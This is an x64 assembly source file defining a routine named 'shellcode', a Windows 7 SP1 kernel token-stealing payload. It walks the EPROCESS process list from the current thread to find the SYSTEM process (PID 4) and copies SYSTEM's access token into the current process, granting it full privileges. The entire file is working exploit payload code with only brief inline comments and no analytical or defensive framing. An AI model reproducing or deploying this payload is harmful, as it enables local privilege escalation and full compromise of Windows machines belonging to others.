
PUBLIC  shellcode
					
_TEXT	SEGMENT
EXTRN	g_kthread:QWORD
extrn	g_EPROCESS:QWORD
extrn	g_EPROCESS_TokenOffset:QWORD
extrn	g_flink:QWORD
extrn	g_PID:QWORD
shellcode PROC
		mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread
		mov rax, [rax + 104];// Get nt!_KTHREAD.ApcState.Process
		mov rcx, rax;// Copy current _EPROCESS structure
		mov rdx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4
		mov rdi, 232;
	SearchSystemPID:
		mov rax, [rax + rdi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink
		sub rax, rdi;
		cmp [rax + 224], rdx;// Get nt!_EPROCESS.UniqueProcessId
		jne SearchSystemPID

		mov rdx, [rax + 360];// Get SYSTEM process nt!_EPROCESS.Token
		mov [rcx + 360], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process
		xor rax, rax;// Set NTSTATUS SUCCEESS
		ret;
shellcode ENDP

_TEXT	ENDS

END